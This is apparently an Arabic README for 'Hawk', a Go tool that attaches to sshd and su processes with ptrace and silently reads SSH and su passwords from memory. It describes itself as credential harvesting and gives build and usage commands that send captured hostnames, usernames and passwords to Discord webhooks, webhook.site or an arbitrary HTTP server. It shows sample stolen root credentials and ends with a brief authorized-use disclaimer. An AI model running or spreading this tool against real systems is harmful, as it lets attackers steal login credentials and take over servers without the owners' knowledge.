
أداة مكتوبة بلغة Golang مصممة لاستخراج كلمات المرور التي يتم العثور عليها عبر خدمتي sshd وsu
اعتراض صامت لبيانات اعتماد SSH و SU في الوقت الفعلي
يراقب Hawk عمليات sshd و su، ويستخرج كلمات المرور من الذاكرة عبر ptrace دون تعديل العمليات المستهدفة. صفر كتابة. حصاد نقي للبيانات الاعتمادية بطريقة القراءة فقط.

يستفيد Hawk من نظام ملفات /proc في لينكس لاكتشاف عمليات SSH و SU، ثم يستخدم ptrace للإرفاق بالعمليات والاعتراض على استدعاءات النظام. عند حدوث مصادقة بكلمة مرور، يقرأ كلمة المرور مباشرة من ذاكرة العملية أثناء استدعاء النظام write() — بشفافية تامة تجاه العملية المستهدفة. تُسرَّب البيانات الاعتمادية عبر webhook أو تُطبع إلى stdout.
تعمّق: مقالة المدونة
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
يكتشف Hawk ويب هوكات Discord تلقائيًا ويرسل رسائل منسقة:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
الإعداد: أنشئ ويب هوكًا في خادم Discord الخاص بك باتباع دليل ويب هوكات Discord. ستظهر البيانات الاعتمادية في قناتك منسقة مع اسم المضيف واسم المستخدم وكلمة المرور.
لخدمات ويب هوك الأخرى (webhook.site، خوادم مخصصة، إلخ):
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path
لا يوجد ويب هوك؟ تُطبع البيانات الاعتمادية إلى stdout:
./hawk
الإخراج:
hostname=server01 username=root password=SuperSecret123
/proc مركّبهذه الأداة مخصصة لاختبارات الأمان المصرح بها وللأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.